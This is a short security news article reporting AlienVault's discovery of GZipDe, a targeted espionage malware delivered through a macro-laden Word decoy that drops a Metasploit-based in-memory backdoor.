Security researchers from AlienVault have discovered a new malware named “GZipDe” which currently seems to be active within a new cyber-espionage campaign. The researchers discovered the malware this week when a user from Afghanistan embedded the malware in a word document and uploaded to VirusTotal.
The document also consisted of information about the Shanghai Cooperation Organization Summit which is a political reference to Eurasian political economic and security topics.
VirusTotal hides the information about the source of the upload. “We’ve only seen one sample of the malware,” Chris Doman, a security researcher with AlienVault said. “It seems very targeted,” Doman added. “Given the decoy, the document is in English and uploaded from Afghanistan, it may have been targeting someone in an embassy or similar there.”
The Word file is an initial step of the infection process which was reported by Doman . The document is used to lure users into enabling macros which is usually achieved by executing Visual Basic scripts inside PowerShell. The execution in PowerShell requests a PE32 executable which actually drops the malware.
GZipDe is coded in .NET which also uses a custom encryption method to confuse the process memory and evade antivirus detection. GZipDe then downloads another potent threat from a remote server. The malware was found in the second server. The AlienVault team has used Shodan to know the details of the malware payload since the search engine scans every open server on the Internet.
GZipDe drops a Metasploit based backdoor which was used by the penetration testers to find the backdoors in the system.
“This shellcode loads the entire DLL into memory, so it’s able to operate while writing no information into the disk. […] From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network.”